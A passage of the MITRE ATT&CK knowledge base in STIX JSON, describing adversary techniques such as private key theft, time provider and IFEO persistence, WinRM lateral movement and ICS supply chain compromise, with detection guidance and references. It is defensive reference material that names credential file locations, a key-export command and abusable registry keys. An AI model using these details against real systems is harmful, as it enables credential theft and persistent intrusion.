"https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf"}, {"source_name": "ADSecurity GPO Persistence 2016", "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.", "url": "https://adsecurity.org/?p=2716"}, {"source_name": "Microsoft Hacking Team Breach", "description": "Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.", "url": "https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/"}, {"source_name": "Wald0 Guide to GPOs", "description": "Robbins, A. (2018, April 2). A Red Teamer\u2019s Guide to GPOs and OUs. Retrieved March 5, 2019.", "url": "https://wald0.com/?p=179"}, {"source_name": "Harmj0y Abusing GPO Permissions", "description": "Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.", "url": "http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/"}, {"source_name": "Harmj0y SeEnableDelegationPrivilege Right", "description": "Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019.", "url": "http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/"}, {"source_name": "TechNet Group Policy Basics", "description": "srachui. (2012, February 13). Group Policy Basics \u2013 Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.", "url": "https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:05.975Z", "name": "Supply Chain Compromise", "description": "Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. \n\nSupply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. \n\nCounterfeit devices may be introduced to the global supply chain posing safety and cyber risks to asset owners and operators. These devices may not meet the safety, engineering and manufacturing requirements of regulatory bodies but may feature tagging indicating conformance with industry standards. Due to the lack of adherence to standards and overall lesser quality, the counterfeit products may pose a serious safety and operational risk. (Citation: Control Global May 2019) \n\nYokogawa identified instances in which their customers received counterfeit differential pressure transmitters using the Yokogawa logo. The counterfeit transmitters were nearly indistinguishable with a semblance of functionality and interface that mimics the genuine product. (Citation: Control Global May 2019) \n\nF-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["File: File Metadata"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0862", "external_id": "T0862"}, {"source_name": "Control Global May 2019", "description": "Control Global 2019, May 29 Yokogawa announcement warns of counterfeit transmitters Retrieved. 2021/04/09 ", "url": "https://www.controlglobal.com/industrynews/2019/yokogawa-announcement-warns-of-counterfeit-transmitters/"}, {"source_name": "Daavid Hentunen, Antti Tikkanen June 2014", "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", "url": "https://www.f-secure.com/weblog/archives/00002718.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Browser Information Discovery", "description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Mike Kemmerer", "Manikantan Srinivasan, NEC Corporation India", "Yinon Engelsman, Talon Cyber Security", "Yonatan Gotlib, Talon Cyber Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1217", "external_id": "T1217"}, {"source_name": "Chrome Roaming Profiles", "description": "Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.", "url": "https://support.google.com/chrome/a/answer/7349337"}, {"source_name": "Kaspersky Autofill", "description": "Golubev, S. (n.d.). How malware steals autofill data from browsers. Retrieved March 28, 2023.", "url": "https://www.kaspersky.com/blog/browser-data-theft/27871/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Serial Connection Enumeration", "description": "Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems.\n\nWhile IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected to. This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Input/Output Server", "Field Controller/RTU/PLC/IED"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0854", "external_id": "T0854"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:06.171Z", "name": "Loss of Safety", "description": "Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner. \n\nMany unsafe conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable safety system functions as a prerequisite to subsequent attack execution or to allow for future unsafe conditionals to go unchecked. Detection of a Loss of Safety by operators can result in the shutdown of a process due to strict policies regarding safety systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0880", "external_id": "T0880"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-04-12T23:52:08.194Z", "name": "Private Keys", "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device\u2019s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n\nOn network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Itzik Kotler, SafeBreach", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication. For network infrastructure devices, collect AAA logging to monitor for private keys being exported.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "created": "2020-02-04T13:06:49.258Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552/004", "external_id": "T1552.004"}, {"source_name": "Palo Alto Prince of Persia", "description": "Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia \u2013 Game Over. Retrieved July 5, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/"}, {"source_name": "cisco_deploy_rsa_keys", "description": "Cisco. (2023, February 17). Chapter: Deploying RSA Keys Within a PKI . Retrieved March 27, 2023.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436"}, {"source_name": "AADInternals Azure AD Device Identities", "description": "Dr. Nestori Syynimaa. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved February 21, 2023.", "url": "https://aadinternals.com/post/deviceidentity/"}, {"source_name": "Kaspersky Careto", "description": "Kaspersky Labs. (2014, February 11). Unveiling \u201cCareto\u201d - The Masked APT. Retrieved July 5, 2017.", "url": "https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf"}, {"source_name": "Microsoft Primary Refresh Token", "description": "Microsoft. (2022, September 9). What is a Primary Refresh Token?. Retrieved February 21, 2023.", "url": "https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token"}, {"source_name": "Wikipedia Public Key Crypto", "description": "Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.", "url": "https://en.wikipedia.org/wiki/Public-key_cryptography"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-28T21:22:52.176Z", "name": "Server", "description": "Adversaries may buy, lease, rent, or obtain physical servers\u00a0that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked) \n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Dor Edry, Microsoft"], "x_mitre_deprecated": false, "x_mitre_detection": "Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337", "created": "2020-10-01T00:48:09.578Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583/004", "external_id": "T1583.004"}, {"source_name": "Freejacked", "description": "Clark, Michael. (2023, August 14). Google\u2019s Vertex AI Platform Gets Freejacked. Retrieved February 28, 2024.", "url": "https://sysdig.com/blog/googles-vertex-ai-platform-freejacked/"}, {"source_name": "Free Trial PurpleUrchin", "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.", "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/"}, {"source_name": "Koczwara Beacon Hunting Sep 2021", "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"}, {"source_name": "Mandiant SCANdalous Jul 2020", "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}, {"source_name": "NYTStuxnet", "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-11T15:26:41.941Z", "name": "Windows Remote Management", "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "created": "2020-02-11T18:29:47.757Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1021/006", "external_id": "T1021.006"}, {"source_name": "Medium Detecting Lateral Movement", "description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc"}, {"source_name": "Jacobsen 2014", "description": "Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell[slides]. Retrieved November 12, 2014.", "url": "https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2"}, {"source_name": "MSDN WMI", "description": "Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.", "url": "https://msdn.microsoft.com/en-us/library/aa394582.aspx"}, {"source_name": "Microsoft WinRM", "description": "Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.", "url": "http://msdn.microsoft.com/en-us/library/aa384426"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Exfiltration Over Bluetooth", "description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.\n\nAdversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "created": "2020-03-09T17:07:57.392Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1011/001", "external_id": "T1011.001"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-03-07T14:27:04.770Z", "name": "Default Accounts", "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers", "Network"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "created": "2020-03-13T20:15:31.974Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1078/001", "external_id": "T1078.001"}, {"source_name": "AWS Root User", "description": "Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.", "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html"}, {"source_name": "Microsoft Local Accounts Feb 2019", "description": "Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.", "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts"}, {"source_name": "Metasploit SSH Module", "description": "undefined. (n.d.). Retrieved April 12, 2019.", "url": "https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh"}, {"source_name": "Threat Matrix for Kubernetes", "description": "Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.", "url": "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-12T02:34:58.003Z", "name": "Time Providers", "description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\`.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Scott Lundgren, @5twenty9, Carbon Black", "Harun K\u00fc\u00dfner"], "x_mitre_deprecated": false, "x_mitre_detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility.(Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk.(Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers.(Citation: TechNet Autoruns)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["SYSTEM", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", "created": "2020-01-24T15:51:52.317Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/003", "external_id": "T1547.003"}, {"source_name": "Github W32Time Oct 2017", "description": "Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.", "url": "https://github.com/scottlundgren/w32time"}, {"source_name": "Microsoft W32Time May 2017", "description": "Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.", "url": "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings"}, {"source_name": "Microsoft W32Time Feb 2018", "description": "Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.", "url": "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top"}, {"source_name": "Microsoft TimeProvider", "description": "Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Image File Execution Options Injection", "description": "Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\u2019s IFEO will be prepended to the application\u2019s name, effectively launching the new process under the debugger (e.g., \u201cC:\\dbg\\ntsd.exe -g notepad.exe\u201d). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where is 